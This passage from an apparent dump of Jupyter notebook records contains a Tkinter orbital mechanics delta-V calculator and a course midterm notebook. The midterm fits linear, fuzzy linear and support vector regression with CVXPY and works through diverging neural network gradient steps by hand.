m/s')\n\t\t\tprint('Please enter your r1 and r2 for Mercury in metres for the second burn')\n\t\t\tr1_Mercury_2 = int(input('r1 = '))\n\t\t\tr2_Mercury_2 = int(input('r2 = '))\n\t\t\tprint(str(deltaV_2(r1_Mercury_2, r2_Mercury_2, Mercury)) + ' m/s')\n\t\t\tprint('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')\n\n\t\telif (planet == 2):\n\t\t\tprint('Please enter your r1 and r2 for Venus in metres for the first burn')\n\t\t\tr1_Venus = int(input('r1 = '))\n\t\t\tr2_Venus = int(input('r2 = '))\n\t\t\tprint(str(deltaV_1(r1_Venus, r2_Venus, Venus)) + ' m/s')\n\t\t\tprint('Please enter your r1 and r2 for Venus in metres for the second burn')\n\t\t\tr1_Venus_2 = int(input('r1 = '))\n\t\t\tr2_Venus_2 = int(input('r2 = '))\n\t\t\tprint(str(deltaV_2(r1_Venus_2, r2_Venus_2, Venus)) + ' m/s')\n\t\t\tprint('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')\n\n\t\telif (planet == 3):\n\t\t\tprint('Please enter your r1 and r2 for Earth in metres for the first burn')\n\t\t\tr1_Earth = int(input('r1 = '))\n\t\t\tr2_Earth = int(input('r2 = '))\n\t\t\tprint(str(deltaV_1(r1_Earth, r2_Earth, Earth)) + ' m/s')\n\t\t\tprint('Please enter your r1 and r2 for Earth in metres for the second burn')\n\t\t\tr1_Earth_2 = int(input('r1 = '))\n\t\t\tr2_Earth_2 = int(input('r2 = '))\n\t\t\tprint(str(deltaV_2(r1_Earth_2, r2_Earth_2, Earth)) + ' m/s')\n\t\t\tprint('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')\n\n\t\telif (planet == 4):\n\t\t\tprint('Please enter your r1 and r2 for Mars in metres for the first burn')\n\t\t\tr1_Mars = int(input('r1 = '))\n\t\t\tr2_Mars = int(input('r2 = '))\n\t\t\tprint(str(deltaV_1(r1_Mars, r2_Mars, Mars)) + ' m/s')\n\t\t\tprint('Please enter your r1 and r2 for Mars in metres for the second burn')\n\t\t\tr1_Mars_2 = int(input('r1 = '))\n\t\t\tr2_Mars_2 = int(input('r2 = '))\n\t\t\tprint(str(deltaV_2(r1_Mars_2, r2_Mars_2, Mars)) + ' m/s')\n\t\t\tprint('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')\n\n\t\telif (planet == 5):\n\t\t\tprint('Please enter your r1 and r2 for Jupiter in metres for the first burn')\n\t\t\tr1_Jupiter = int(input('r1 = '))\n\t\t\tr2_Jupiter = int(input('r2 = '))\n\t\t\tprint(str(deltaV_1(r1_Jupiter, r2_Jupiter, Jupiter)) + ' m/s')\n\t\t\tprint('Please enter your r1 and r2 for Jupiter in metres for the second burn')\n\t\t\tr1_Jupiter_2 = int(input('r1 = '))\n\t\t\tr2_Jupiter_2 = int(input('r2 = '))\n\t\t\tprint(str(deltaV_2(r1_Jupiter_2, r2_Jupiter_2, Jupiter)) + ' m/s')\n\t\t\tprint('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')\n\n\telif (choice == 2):\n\t\tprint('1. Mercury')\n\t\tprint('2. Venus')\n\t\tprint('3. Earth')\n\t\tprint('4. Mars')\n\t\tprint('5. Jupiter')\n\t\tprint('6. Saturn')\n\t\tprint('7. Uranus')\n\t\tprint('8. Neptune')\n\t\tplanet_normrad = int(input('Which planet are you performing a normal or radial burn around? (Assuming velocity is supposed to be maintained)'))\n\t\tangle = int(input('What is the angle you which to change by? (In degrees)'))\n\t\tvelocity_initial = int(input('The initial velocity (m/s) = '))\n#\t\tvelocity_final = int(input('The final velocity (m/s) = '))\n\t\tif (planet_normrad == 1):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telif (planet_normrad == 2):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telif (planet_normrad == 3):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telif (planet_normrad == 4):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telif (planet_normrad == 5):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telif (planet_normrad == 6):\n\t\t\tprint(str(NormRad(velocity_initial, angle,)) + ' m/s')\n\t\telif (planet_normrad == 7):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telse:\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\n\telif (choice == 3):\n\t\tprint('1. Mercury')\n\t\tprint('2. Venus')\n\t\tprint('3. Earth')\n\t\tprint('4. Mars')\n\t\tprint('5. Jupiter')\n\t\tprint('6. Saturn')\n\t\tprint('7. Uranus')\n\t\tprint('8. Neptune')\n\t\tplanet_normrad = int(input('Which planet are you performing a normal or radial burn around? (Assuming velocity is supposed to be maintained)'))\n\t\tangle = int(input('What is the angle you which to change by? (In degrees)'))\n\t\tvelocity_initial = int(input('The initial velocity (m/s) = '))\n\t\tvelocity_final = int(input('The final velocity (m/s) = '))\n\t\tif (planet_normrad == 1):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telif (planet_normrad == 2):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telif (planet_normrad == 3):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telif (planet_normrad == 4):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telif (planet_normrad == 5):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telif (planet_normrad == 6):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle,)) + ' m/s')\n\t\telif (planet_normrad == 7):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telse:\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\n\telif (choice == 4):\n\t\tprint('1. Mercury')\n\t\tprint('2. Venus')\n\t\tprint('3. Earth')\n\t\tprint('4. Mars')\n\t\tprint('5. Jupiter')\n\t\tprint('6. Saturn')\n\t\tprint('7. Uranus')\n\t\tprint('8. Neptune')\n\t\tprint('9. Custom planet')\n\t\tplanet_info = int(input('Which planets information would you like?'))\n\t\tif (planet_info == 1):\n\t\t\tprint(Planet_info(Mercury))\n\t\telif(planet_info == 2):\n\t\t\tprint(Planet_info(Venus))\n\t\telif(planet_info == 3):\n\t\t\tprint(Planet_info(Earth))\n\t\telif(planet_info == 4):\n\t\t\tprint(Planet_info(Mars))\n\t\telif(planet_info == 5):\n\t\t\tprint(Planet_info(Jupiter))\n\t\telif(planet_info == 6):\n\t\t\tprint(Planet_info(Saturn))\n\t\telif(planet_info == 7):\n\t\t\tprint(Planet_info(Uranus))\n\t\telif(planet_info == 8):\n\t\t\tprint(Planet_info(Neptune))\n\t\telif(planet_info == 9):\n\t\t\ttry:\n\t\t\t\tprint(Planet_info(custom_planet))\n\t\t\texcept NameError:\n\t\t\t\tprint('Custom planet data not found, please create a custom planet and then try again')\n\n\t\telse:\n\t\t\tprint('Incorrect option. Please try again')\n\n\telif (choice == 5):\n\t\tname = print(str(input('What is the name of your custom planet? ')))\n\t\tsemi_major = float(input('What is ' + str(name) + 's semi-major axis? [m] '))\n\t\tmass = float(input('What is the mass of ' + str(name) + '? [kg]'))\n\t\teccen = float(input('What is ' + str(name) + 's eccentricity? [Dimensionless] '))\n\t\tperiod = float(input('What is ' + str(name) + 's orbital period? [s] '))\n\t\trad = float(input('What is the radius of ' + str(name) + '[m]')) \n\t\tcustom_planet = Planet(semi_major, mass, eccen, period, rad)\n\t\tprint(Planet_info(custom_planet))\n\n\n\telif (choice == 6):\n\t\texit()\n\n\telse:\n\t\tprint('Incorrect choice, please select a valid number')\n\n",
"_____no_output_____"
]
],
[
[
"root = tk.Tk()\n#root = tk.Toplevel()\nroot.state('zoomed')\nroot.iconbitmap('rocket_icon.ico')\nroot.title('Orbital Mechanics Calculator')\nHEIGHT = 700\nWIDTH = 1000\ncanvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)\ncanvas.pack()\n\n#background_image = tk.PhotoImage(file='cosmos-5809271_1920.png')\nbackground_image = tk.PhotoImage(file='rocket_background_collaged.png')\nbackground_label = tk.Label(root, image=background_image)\nbackground_label.place(relwidth=1, relheight=1)\n\nframe = tk.Frame(root, bg='#00688B', bd=5)\n#frame = tk.Frame(root, bg='#80c1ff', bd=5)\nframe.place(relx=0.5, rely=0.1, relwidth=0.75, relheight=0.3, anchor='n')\n\ntk.Label(frame, text = \"r1:\").place(relwidth=0.03, relheight=0.15) \ntk.Label(frame, text = \"r2:\").place(relx=0.21, relwidth=0.03, relheight=0.15) \ntk.Label(frame, text = \"Planet:\").place(relx=0.41, relwidth=0.03, relheight=0.15)\n\ntk.Label(frame, text = \"velocity:\").place(relwidth=0.03, relheight=0.15, rely=0.25) \ntk.Label(frame, text = \"theta:\").place(relx=0.21, relwidth=0.03, relheight=0.15, rely=0.25) \n\nentry_r1_1 = tk.Entry(frame, font=40, text='r1')\nentry_r1_1.place(relwidth=0.15, relx=0.05, rely=0, relheight=0.15)\n\nentry_r2_1 = tk.Entry(frame, font=40, text='r2')\nentry_r2_1.place(relwidth=0.15, relx=0.25, rely=0, relheight=0.15)\n\nentry_planet_1 = tk.Entry(frame, font=40, text='Planet')\nentry_planet_1.place(relwidth=0.15, relx=0.45, rely=0, relheight=0.15)\n\nentry_vi = tk.Entry(frame, font=40, text='initial velocity')\nentry_vi.place(relwidth=0.15, relx=0.05, rely=0.25, relheight=0.15)\n\nentry_theta_1 = tk.Entry(frame, font=40)\nentry_theta_1.place(relwidth=0.15, rely=0.25, relx =0.25, relheight=0.15)\n\nentry_vi_2 = tk.Entry(frame, font=40)\nentry_vi_2.place(relwidth=0.15, rely=0.5, relx=0.05, relheight=0.15)\n\nentry_vf = tk.Entry(frame, font=40)\nentry_vf.place(relwidth=0.15, rely=0.5, relx=0.25, relheight=0.15)\n\nentry_theta = tk.Entry(frame, font=40)\nentry_theta.place(relwidth=0.15, rely=0.5, relx =0.45, relheight=0.15)\n\n#entry_\n\n#button_hohmann_1 = tk.Button(frame, text=\"Hohmann Transfer Delta-V\", font=40, command=lambda: deltaV_1(float(entry_r1_1.get()), float(entry_r2_1.get()),Earth))\nbutton_hohmann_1 = tk.Button(frame, text=\"Hohmann Transfer Delta-V\", font=40, command=lambda: deltaV_1(float(entry_r1_1.get()), float(entry_r2_1.get()),entry_planet_1.get()))\nbutton_hohmann_1.place(relx=0.7, rely=0, relheight=0.15, relwidth=0.3)\n\nbutton_normrad = tk.Button(frame, text=\"Normal/Radial Delta-V\", font=40, command=lambda: NormRad(float(entry_vi.get()), float(entry_theta_1.get())))\nbutton_normrad.place(relx=0.7, rely=0.25, relheight=0.15, relwidth=0.3)\n\nbutton_normrad_diffV = tk.Button(frame, text=\"Normal/Radial Delta-V (Different velocities)\", font=40, command=lambda: NormRad_TwoVel(float(entry_vi_2.get()),float(entry_vf.get()),float(entry_theta.get())))\nbutton_normrad_diffV.place(relx=0.7, rely=0.5, relheight=0.15, relwidth=0.3)\n\n\nlower_frame = tk.Frame(root, bg='#00688B', bd=10)\nlower_frame.place(relx=0.5, rely=0.65, relwidth=0.25, relheight=0.2, anchor='n')\n\nlabel = tk.Label(lower_frame)\nlabel.place(relwidth=1, relheight=1)\n\n\nroot.mainloop()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb53c0169b337c2fafbf32c8b9dcb8be031c3604 | 13,472 | ipynb | Jupyter Notebook | standardiser/docs/01_break_bonds.ipynb | thesgc/standardiser | 635f2608e70c18dc17fa32d514abafc227ff005e | [
"Apache-2.0"
] | 2 | 2016-03-15T15:27:25.000Z | 2021-07-05T04:53:09.000Z | standardiser/docs/01_break_bonds.ipynb | thesgc/standardiser | 635f2608e70c18dc17fa32d514abafc227ff005e | [
"Apache-2.0"
] | null | null | null | standardiser/docs/01_break_bonds.ipynb | thesgc/standardiser | 635f2608e70c18dc17fa32d514abafc227ff005e | [
"Apache-2.0"
] | null | null | null | 69.803109 | 2,777 | 0.806859 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb53c233bae51a442ce55bf4c819b08bf8234623 | 396,886 | ipynb | Jupyter Notebook | Midterm_CVXPY solve SVR, implement NN from scratch.ipynb | Yike-Li/Computational-Intellgence | d0dad9b966186bc8bb2ca1a621ad1457e72f689d | [
"Apache-2.0"
] | 1 | 2021-12-28T12:51:35.000Z | 2021-12-28T12:51:35.000Z | Midterm_CVXPY solve SVR, implement NN from scratch.ipynb | Yike-Li/Computational-Intellgence | d0dad9b966186bc8bb2ca1a621ad1457e72f689d | [
"Apache-2.0"
] | null | null | null | Midterm_CVXPY solve SVR, implement NN from scratch.ipynb | Yike-Li/Computational-Intellgence | d0dad9b966186bc8bb2ca1a621ad1457e72f689d | [
"Apache-2.0"
] | null | null | null | 172.784502 | 94,212 | 0.880648 | [
[
[
"<h1>CI Midterm<span class=\"tocSkip\"></span></h1>\n<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#Q1-Simple-Linear-Regression\" data-toc-modified-id=\"Q1-Simple-Linear-Regression-1\">Q1 Simple Linear Regression</a></span></li><li><span><a href=\"#Q2-Fuzzy-Linear-Regression\" data-toc-modified-id=\"Q2-Fuzzy-Linear-Regression-2\">Q2 Fuzzy Linear Regression</a></span></li><li><span><a href=\"#Q3-Support-Vector-Regression\" data-toc-modified-id=\"Q3-Support-Vector-Regression-3\">Q3 Support Vector Regression</a></span></li><li><span><a href=\"#Q4-Single-layer-NN\" data-toc-modified-id=\"Q4-Single-layer-NN-4\">Q4 Single-layer NN</a></span><ul class=\"toc-item\"><li><span><a href=\"#First-two-iterations-illustration\" data-toc-modified-id=\"First-two-iterations-illustration-4.1\">First two iterations illustration</a></span></li><li><span><a href=\"#Code\" data-toc-modified-id=\"Code-4.2\">Code</a></span></li></ul></li><li><span><a href=\"#Q5-Two-layer-NN\" data-toc-modified-id=\"Q5-Two-layer-NN-5\">Q5 Two-layer NN</a></span><ul class=\"toc-item\"><li><span><a href=\"#First-two-iterations-illustration\" data-toc-modified-id=\"First-two-iterations-illustration-5.1\">First two iterations illustration</a></span></li><li><span><a href=\"#Code\" data-toc-modified-id=\"Code-5.2\">Code</a></span></li></ul></li><li><span><a href=\"#Q6-Re-do-Q1-Q5\" data-toc-modified-id=\"Q6-Re-do-Q1-Q5-6\">Q6 Re-do Q1-Q5</a></span><ul class=\"toc-item\"><li><span><a href=\"#Simple-Linear-Regression\" data-toc-modified-id=\"Simple-Linear-Regression-6.1\">Simple Linear Regression</a></span></li><li><span><a href=\"#Fuzzy-Linear-Regression\" data-toc-modified-id=\"Fuzzy-Linear-Regression-6.2\">Fuzzy Linear Regression</a></span></li><li><span><a href=\"#Support-Vector-Regression\" data-toc-modified-id=\"Support-Vector-Regression-6.3\">Support Vector Regression</a></span></li><li><span><a href=\"#Single-layer-NN\" data-toc-modified-id=\"Single-layer-NN-6.4\">Single-layer NN</a></span><ul class=\"toc-item\"><li><span><a href=\"#First-two-iterations-illustration\" data-toc-modified-id=\"First-two-iterations-illustration-6.4.1\">First two iterations illustration</a></span></li><li><span><a href=\"#Code\" data-toc-modified-id=\"Code-6.4.2\">Code</a></span></li></ul></li><li><span><a href=\"#Two-layer-NN\" data-toc-modified-id=\"Two-layer-NN-6.5\">Two-layer NN</a></span><ul class=\"toc-item\"><li><span><a href=\"#First-two-iterations-illustration\" data-toc-modified-id=\"First-two-iterations-illustration-6.5.1\">First two iterations illustration</a></span></li><li><span><a href=\"#Code\" data-toc-modified-id=\"Code-6.5.2\">Code</a></span></li></ul></li></ul></li><li><span><a href=\"#Q7-Discussion\" data-toc-modified-id=\"Q7-Discussion-7\">Q7 Discussion</a></span><ul class=\"toc-item\"><li><span><a href=\"#Discussion-of-Convergence-Issue\" data-toc-modified-id=\"Discussion-of-Convergence-Issue-7.1\">Discussion of Convergence Issue</a></span></li></ul></li><li><span><a href=\"#Q8-Bonus-Question\" data-toc-modified-id=\"Q8-Bonus-Question-8\">Q8 Bonus Question</a></span><ul class=\"toc-item\"><li><span><a href=\"#Simple-Linear-Regression\" data-toc-modified-id=\"Simple-Linear-Regression-8.1\">Simple Linear Regression</a></span></li><li><span><a href=\"#Fuzzy-Linear-Regression\" data-toc-modified-id=\"Fuzzy-Linear-Regression-8.2\">Fuzzy Linear Regression</a></span></li><li><span><a href=\"#Support-Vector-Regression\" data-toc-modified-id=\"Support-Vector-Regression-8.3\">Support Vector Regression</a></span></li><li><span><a href=\"#Single-layer-NN\" data-toc-modified-id=\"Single-layer-NN-8.4\">Single-layer NN</a></span></li></ul></li></ul></div>",
"_____no_output_____"
],
[
"## Q1 Simple Linear Regression",
"_____no_output_____"
],
[
"First, the training data has been visualized as below. ",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nimport pandas as pd\nimport cvxpy as cp\nimport matplotlib.pyplot as plt\n\nar = np.array([[1, 1, 1, 1, 1, 1], # intercept\n [1, 2, 3, 4, 5, 6], # x\n [1, 2, 3, 4, 5, 6]]) # y\n\n# plot the dot points\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.title('Visualization of training observations')\nplt.axis('scaled')\nplt.show()",
"_____no_output_____"
]
],
[
[
"The data has been processed and the optimization problem (least sum of square) has been formulated. The estimate of $a$ (the slope) is very close to 1 and $b$ (intercept) is very close to 0. The fitted line has been plotted above the training set as well. ",
"_____no_output_____"
]
],
[
[
"# Data preprocessing\nX_lp = ar[[0, 1], :].T # transpose the array before modeling\ny_lp = ar[2].T\n\n# Define and solve the CVXPY problem.\nbeta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total\ncost = cp.sum_squares(X_lp * beta - y_lp) # define cost function\nobj = cp.Minimize(cost) # define objective function\nprob = cp.Problem(obj)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe estimated of a (slope) is:\", beta.value[1],\n \"\\nThe estimate of b (intercept) is:\", beta.value[0])\n\nx = np.linspace(0, 10, 100)\ny = beta.value[1] * x + beta.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = ax + b')\nplt.title('Fitted line using simple LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nThe optimal value of loss is: 2.0532810769192338e-17\n\nThe estimated of a (slope) is: 0.9999999990246303 \nThe estimate of b (intercept) is: 4.218391830290713e-09\n"
]
],
[
[
"## Q2 Fuzzy Linear Regression",
"_____no_output_____"
],
[
"Same as HW2, the optimization problem has been formulated as below. Here I pick the threshold $\\alpha$ as $0.5$ for spread calculation. Similar to Q1, The estimate of $A_1$ (the slope) is 1 and $A_0$ (intercept) is 0. The spread of $A_1$ and $A_0$ have both been calculated. As expected, both spreads are 0 since the regression line fits perfectly to the training data and there is no need of spreads to cover any errors between the estimate $\\hat{y}$ and the true values $y$. \n\nThe fitted line has been plotted above the training set as well.",
"_____no_output_____"
]
],
[
[
"# Define threshold h (it has same meaning as the alpha in alpha-cut). Higher the h, wider the spread.\nh = 0.5\n# Define and solve the CVXPY problem.\nc = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1\nalpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1\ncost = cp.sum(X_lp * c) # define cost function\nobj = cp.Minimize(cost) # define objective function\nconstraints = [c >= 0,\n y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp\n -y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]\n\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe center of A1 (slope) is:\", alpha.value[1],\n \"\\nThe spread of A1 (slope) is:\", c.value[1],\n \"\\nThe center of A0 (intercept) is:\", alpha.value[0],\n \"\\nThe spread of A0 (intercept) is:\", c.value[0])\n\nx = np.linspace(0, 10, 100)\ny = alpha.value[1] * x + alpha.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = A1x + A0')\nplt.title('Fitted line using Fuzzy LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nThe optimal value of loss is: 0.0\n\nThe center of A1 (slope) is: 1.0 \nThe spread of A1 (slope) is: 0.0 \nThe center of A0 (intercept) is: 0.0 \nThe spread of A0 (intercept) is: 0.0\n"
]
],
[
[
"## Q3 Support Vector Regression",
"_____no_output_____"
],
[
"In the course lecture, it was mentioned that the objective function of SVR is to ***minimize the sum of squares plus seek for flatness of the hyperplane.*** In $\\epsilon$-SV regression, our goal is to find a function $f(x)$ that has at most $\\epsilon$ deviation from the actually obtained targets $y_i$ for all the training data, and at the same time is as flat as possible. Flatness in the case means that one seeks a small $w$ and the approach here is to minimize the L2-norm. The problem can be written as a convex optimization problem:",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"Sometimes the convex optimization problem does not render feasible solution. We also may want to allow for some errors. Similarly to the loss function of “soft margin” in SVM, we introduce slack variables $ξ_i$, $ξ_i^*$ to cope with otherwise infeasible constraints of the optimization problem:",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"Here the constent $C$ should be $>0$ and determines the trade-off between the flatness of $f(x)$ and the amount up to which deviations larger than $\\epsilon$ are tolerated. The optimization problem is formulated with slack variables and in the program below, I defined $C$ as $\\frac{1}{N}$ where $N=6$ is the # of observations in the training set. The $\\epsilon$ here has been set to 0. \n\nFrom the output below, the estimated $w$ is very close to 1 and $b$ is very close to 0. ",
"_____no_output_____"
]
],
[
[
"# The constant C, defines the trade-off between the flatness of f and the amount up to which deviations larger than ε are tolerated.\n# When C gets bigger, the margin get softer. Here C is defined as 1/N. N is the # of observations.\nC = 1 / len(ar[1])\nepsilon = 0 # For this ε-SVR problem set ε=0\n# Define and solve the CVXPY problem.\nbw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w\nepsilon1 = cp.Variable(X_lp.shape[0]) # for slack variables ξi\nepsilon2 = cp.Variable(X_lp.shape[0]) # for slack variables ξ*i\ncost = 1 / 2 * bw[1] ** 2 + C * cp.sum(epsilon1 + epsilon2) # define cost function\nobj = cp.Minimize(cost) # define objective function\nconstraints = [epsilon1 >= 0,\n epsilon2 >= 0,\n y_lp <= X_lp * bw + epsilon + epsilon1,\n -y_lp <= -(X_lp * bw) + epsilon + epsilon2]\n\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe estimate of w is:\", bw.value[1],\n \"\\nThe estimate of b is:\", bw.value[0], )",
"\nThe estimate of w is: 0.9999999970629421 \nThe estimate of b is: 9.380686338580135e-09\n"
]
],
[
[
"The fitted line has been plotted above the training set as well:",
"_____no_output_____"
]
],
[
[
"x = np.linspace(0, 10, 100)\ny = bw.value[1] * x + bw.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = wx + b')\nplt.title('Fitted line using SVR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Q4 Single-layer NN",
"_____no_output_____"
],
[
"### First two iterations illustration",
"_____no_output_____"
],
[
"From the NN archiecture on Lecture 7 page 13, the network output $a$ can be denoted as:\n\n$$a=f(x)=f(wp+b)$$\nwhere\n$$x=wp+b\\quad f(x)=5x\\quad \\frac{\\partial f}{\\partial x}=5$$\nSince $b=1$,\n$$a=f(x)=f(wp+b)=5(wp+1)$$",
"_____no_output_____"
],
[
"Set the loss function $E$ as:\n$$ E=\\sum_{i=1}^N \\frac{1}{2}(T_i-a_i)^2 $$\nwhere $T_i$ is the target value for each input $i$ and $N$ is the number of observations in the training set. \n\nWe can find the gradient for $w$ by:\n\n$$\\frac{\\partial E}{\\partial w}=\\frac{\\partial E}{\\partial a}\\frac{\\partial a}{\\partial x}\\frac{\\partial x}{\\partial w}$$",
"_____no_output_____"
],
[
"**For the 1st iteration**, with initial value $w=10$:\n\n$$\n\\frac{\\partial E}{\\partial a}=a-T=5(wp_i+1)-T_i\\\\\n\\frac{\\partial f}{\\partial x}=5$$\n$$\\frac{\\partial x_1}{\\partial w}=p_1=1$$\n$$\\vdots$$\n$$\\frac{\\partial x_6}{\\partial w}=p_6=6$$\n\nFor $i=1$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*1+1)-1=54\\\\\n\\frac{\\partial E}{\\partial w}=54*5*1$$\nFor $i=2$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-2=103\\\\\n\\frac{\\partial E}{\\partial w}=103*5*2$$\nFor $i=3$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-3=152\\\\\n\\frac{\\partial E}{\\partial w}=152*5*3$$\nFor $i=4$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*4+1)-4=201\\\\\n\\frac{\\partial E}{\\partial w}=201*5*4$$\nFor $i=5$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*5+1)-5=250\\\\\n\\frac{\\partial E}{\\partial w}=250*5*5$$\nFor $i=6$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*6+1)-6=299\\\\\n\\frac{\\partial E}{\\partial w}=299*5*6$$\n\nThe sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w})=(54*1+103*2+152*3+201*4+250*5+299*6)*5=22820\n$$\nAverage the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w})}{N}=380.333\n$$.",
"_____no_output_____"
],
[
"The new $w$ and output $a$ is calculated:\n$$w=10-380.333=-370.333\\\\\na=[-1846.667,-3698.333,-5550,-7401.667,-9253.333, -11105]\n$$",
"_____no_output_____"
],
[
"**For the 2nd iteration:**\n\nFor $i=1$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*1+1)-1=-1847.667\\\\\n\\frac{\\partial E}{\\partial w}=-1847.667*5*1$$\nFor $i=2$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*2+1)-2=-3700.333\\\\\n\\frac{\\partial E}{\\partial w}=-3700.333*5*2$$\nFor $i=3$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*3+1)-3=-5553\\\\\n\\frac{\\partial E}{\\partial w}=-5553*5*3$$\nFor $i=4$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*4+1)-4=-7405.667\\\\\n\\frac{\\partial E}{\\partial w}=-7405.667*5*4$$\nFor $i=5$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*5+1)-5=-9258.333\\\\\n\\frac{\\partial E}{\\partial w}=-9258.333*5*5$$\nFor $i=6$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*6+1)-6=-11111\\\\\n\\frac{\\partial E}{\\partial w}=-11111*5*6$$\n\nThe sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w})=(-1847.667*1+-3700.333*2+-5553*3+-7405.667*4+-9258.333*5+-11111*6)*5=-842438.333\n$$\nAverage the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w})}{N}=-14040.639\n$$.",
"_____no_output_____"
],
[
"The new $w$ and output $a$ is calculated:\n$$w=-370.333-(-14040.638)=-13670.305\\\\\na=[68356.528, 136708.056, 205059.583, 273411.111, 341762.639, 410114.167]\n$$",
"_____no_output_____"
],
[
"### Code",
"_____no_output_____"
],
[
"**We can tell from the above that throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge.** Further discussion has been made in Q7 to explore for a proper learning rate in this case. \n\nFrom the code below, after 30 iterations the loss function value becomes larger and larger and won't be able to converge, which further proves the findings. ",
"_____no_output_____"
]
],
[
[
